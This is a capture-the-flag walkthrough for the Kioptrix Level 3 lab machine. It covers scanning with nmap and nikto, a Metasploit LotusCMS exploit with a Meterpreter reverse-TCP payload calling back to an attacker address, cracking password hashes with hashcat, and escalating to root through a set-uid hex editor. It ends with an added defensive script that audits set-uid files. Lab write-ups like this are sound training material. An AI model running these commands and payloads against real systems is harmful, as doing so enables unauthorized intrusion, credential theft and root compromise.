vulhub-Kioptrix Level 3

Tools:

  • netdiscover
  • Nmap
  • Nikto
  • Metasploit
  • Wfuzz
  • Hashcat

Use netdiscover to detect the target IP address:

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.184 is the target.

Then run nmap to detect open ports and running services on the target machine:

nmap -sV -v -O -A -T5 192.168.79.184 -p-

Ports 22 and 80 are open.

Now use Nikto to scan:

nikto -h 192.168.79.184

Nothing exciting.

Now let's browse the web page on the target.

It turns out the target may use LotusCMS.

In msfconsole:

search LotusCMS

This finds one exploit:

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(lcms_php_exec) > set rhost 192.168.79.184
msf exploit(lcms_php_exec) > set uri 
msf exploit(lcms_php_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(lcms_php_exec) > set lhost 192.168.79.173
exploit

Got the shell; the next step is to try to get root.

In this step, I tried to enumerate all kinds of shit and use several vulnerable kernel exploits to get root, but failed. During the enumeration, I found an interesting file, gconfig.php. Then I found that:

Maybe the username/password for SSH, but no. That's too easy.

So I go back and use wfuzz to scan the HTTP service.

Looks like it has phpMyAdmin. Try that:

Log in using the username/password just found. Success.

Reviewing the content, found this:

Now we have two users and their hashed passwords:

Copy the password hashes to a file and use hashcat to crack them:

hashcat hash.txt /usr/share/wordlists/rockyou.txt

Got both passwords:

SSH to the target and search for SUID binaries:

find / -perm +6000 -type f -exec ls -ld {} \;

Found an interesting file, /usr/local/bin/ht. I googled it and found it is a hex editor.

Now try to use it to open the /etc/sudoers file; this gives an error message. To fix it:

export TERM=xterm

Change the loneferret permissions:

Get root.

DONE
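
On the defensive side, the same SUID search is the audit that would flag a set-uid editor such as ht on a host. The script below is an added example, not part of the original walkthrough: it lists set-uid/set-gid files under a directory and reports any that are missing from an allowlist. The function names and the allowlist format (one absolute path per line) are assumptions.

```shell
#!/bin/sh
# Added example: audit set-uid/set-gid files against an allowlist.
# Function names and the allowlist format are assumptions of this example.

# List regular files under $1 that carry the set-uid or set-gid bit,
# one path per line, sorted. The POSIX "-perm -mode" tests are used because
# the "-perm +6000" form is no longer accepted by current GNU find.
list_privileged() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Print every privileged file under $1 that is not listed in allowlist $2.
# Returns 0 when everything found is allowlisted, 1 when something is
# unexpected, 2 when a temporary file cannot be created.
audit_privileged() {
    audit_root=$1
    audit_allow=$2
    audit_tmp=$(mktemp) || return 2
    list_privileged "$audit_root" > "$audit_tmp"
    # comm -23 keeps lines that appear only in the first (found) list.
    audit_unexpected=$(sort "$audit_allow" | comm -23 "$audit_tmp" -)
    rm -f "$audit_tmp"
    [ -z "$audit_unexpected" ] && return 0
    printf '%s\n' "$audit_unexpected"
    return 1
}

# Stand-alone use: ./suid_audit.sh <root-dir> <allowlist-file>
if [ "$#" -ge 2 ]; then
    audit_privileged "$1" "$2"
fi
```

Run it from cron or a configuration-management check with an allowlist built from a known-good install, and review anything it prints, particularly editors, interpreters and other programs that can write arbitrary files.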